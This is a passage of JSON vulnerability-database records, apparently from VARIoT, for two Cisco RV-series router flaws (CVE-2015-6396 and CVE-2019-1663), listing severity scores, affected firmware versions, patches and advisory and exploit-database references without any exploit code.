"db": "SECTRACK",
"id": "1036528",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2016.1890",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2016-06162",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-84357",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "150781",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"id": "VAR-201608-0273",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
}
],
"trust": 1.233139435
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
}
]
},
"last_update_date": "2024-11-23T21:55:27.059000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160803-rv110_130w1",
"trust": 0.8,
"url": "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160803-rv110_130w1"
},
{
"title": "Patches for any command execution vulnerability in multiple Cisco products",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/80243"
},
{
"title": "Cisco RV110W , RV130W and RV215W Repair measures for device security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63566"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160803-rv110_130w1"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/92269"
},
{
"trust": 1.1,
"url": "https://www.exploit-db.com/exploits/45986/"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036528"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6396"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6396"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/render.html?it=37422"
},
{
"trust": 0.4,
"url": "http://www.cisco.com/"
},
{
"trust": 0.1,
"url": "https://\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0683"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-6396"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"db": "VULHUB",
"id": "VHN-84357"
},
{
"db": "BID",
"id": "92269"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"db": "PACKETSTORM",
"id": "150781"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"date": "2016-08-08T00:00:00",
"db": "VULHUB",
"id": "VHN-84357"
},
{
"date": "2016-08-03T00:00:00",
"db": "BID",
"id": "92269"
},
{
"date": "2016-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"date": "2018-12-14T18:00:57",
"db": "PACKETSTORM",
"id": "150781"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"date": "2016-08-08T00:59:00.140000",
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-09T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-06162"
},
{
"date": "2018-12-15T00:00:00",
"db": "VULHUB",
"id": "VHN-84357"
},
{
"date": "2016-08-03T00:00:00",
"db": "BID",
"id": "92269"
},
{
"date": "2016-08-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-007226"
},
{
"date": "2016-08-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-173"
},
{
"date": "2024-11-21T02:34:55.313000",
"db": "NVD",
"id": "CVE-2015-6396"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "92269"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
],
"trust": 0.9
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Device product CLI Any command with administrator privileges in the command parser shell Command execution vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-007226"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-173"
}
],
"trust": 0.6
}
}
var-201902-0427
Vulnerability from variot
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. This issue is tracked by Cisco Bug ID CSCvn18638, CSCvn18639, CSCvn18642
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201902-0427",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv110w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.2.2.1"
},
{
"model": "rv215w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.3.1.1"
},
{
"model": "rv130w",
"scope": "lt",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.3.45"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.2.2.1"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.0.3.45"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lt",
"trust": 0.8,
"vendor": "cisco",
"version": "1.3.1.1"
},
{
"model": "rv110w none",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w none",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w none",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "small business rv series routers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.0.8"
},
{
"model": "small business rv series routers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "small business rv series routers",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.1.2"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"model": "small business rv series routers",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.1.1"
},
{
"model": "small business rv series routers",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.2.1"
},
{
"model": "small business rv series routers",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.45"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.3.1.1"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.0.3.45"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "1.2.2.1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "BID",
"id": "107185"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Yu Zhang ????????Haoliang Lu ?? ??,the following security researchers: Yu Zhang and Haoliang Lu at the GeekPwn conference T. Shiomitsu of Pen Test Partners LLP",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
}
],
"trust": 0.6
},
"cve": "CVE-2019-1663",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2019-1663",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-05902",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2022-32613",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-148795",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "ykramarz@cisco.com",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1663",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-1663",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-1663",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2019-1663",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-1663",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2019-05902",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2022-32613",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-988",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-148795",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-1663",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
},
{
"db": "NVD",
"id": "CVE-2019-1663"
},
{
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. \nThis issue is tracked by Cisco Bug ID CSCvn18638, CSCvn18639, CSCvn18642",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-1663"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "BID",
"id": "107185"
},
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
}
],
"trust": 3.15
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47348",
"trust": 0.3,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-148795",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-1663",
"trust": 4.1
},
{
"db": "BID",
"id": "107185",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "152507",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "154310",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "153163",
"trust": 1.2
},
{
"db": "EXPLOIT-DB",
"id": "46705",
"trust": 1.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2022-32613",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201902-988",
"trust": 0.7
},
{
"db": "EXPLOITALERT",
"id": "33303",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-05902",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "42833",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.0622.2",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-148795",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "47348",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-1663",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"db": "BID",
"id": "107185"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
},
{
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"id": "VAR-201902-0427",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "VULHUB",
"id": "VHN-148795"
}
],
"trust": 2.0267129244444444
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
}
]
},
"last_update_date": "2024-11-23T21:37:39.016000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20190227-rmi-cmd-ex",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex"
},
{
"title": "Patch for CiscoRV110W, RV130W, and RV215W Remote Command Execution Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/155001"
},
{
"title": "Patch for Buffer Overflow Vulnerability in Multiple Cisco Products (CNVD-2022-32613)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/331126"
},
{
"title": "Cisco?RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89695"
},
{
"title": "Cisco: Cisco RV110W, RV130W, and RV215W Routers Management Interface Remote Command Execution Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20190227-rmi-cmd-ex"
},
{
"title": "Cisco-RV130W",
"trust": 0.1,
"url": "https://github.com/welove88888/Cisco-RV130W "
},
{
"title": "dir2md",
"trust": 0.1,
"url": "https://github.com/XinRoom/dir2md "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/zero-day-bug-soho-routers/165321/"
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2019/06/24/security_roundup/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/cisco-fixes-critical-flaw-in-wireless-vpn-firewall-routers/142284/"
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-rce-vulnerability-in-rv110w-rv130w-and-rv215w-routers/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "CWE-119",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "NVD",
"id": "CVE-2019-1663"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.4,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190227-rmi-cmd-ex"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-1663"
},
{
"trust": 1.9,
"url": "http://www.securityfocus.com/bid/107185"
},
{
"trust": 1.3,
"url": "http://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv130_rmi_rce"
},
{
"trust": 1.2,
"url": "https://www.exploit-db.com/exploits/46705/"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/152507/cisco-rv130w-routers-management-interface-remote-command-execution.html"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/153163/cisco-rv130w-1.0.3.44-remote-stack-overflow.html"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/154310/cisco-rv110w-rv130-w-rv215w-remote-command-execution.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-1663"
},
{
"trust": 0.6,
"url": "https://www.exploitalert.com/view-details.html?id=33303"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/42833"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/76242"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://github.com/welove88888/cisco-rv130w"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/47348"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-05902"
},
{
"db": "CNVD",
"id": "CNVD-2022-32613"
},
{
"db": "VULHUB",
"id": "VHN-148795"
},
{
"db": "VULMON",
"id": "CVE-2019-1663"
},
{
"db": "BID",
"id": "107185"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002114"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-988"
},
{
"db": "NVD",
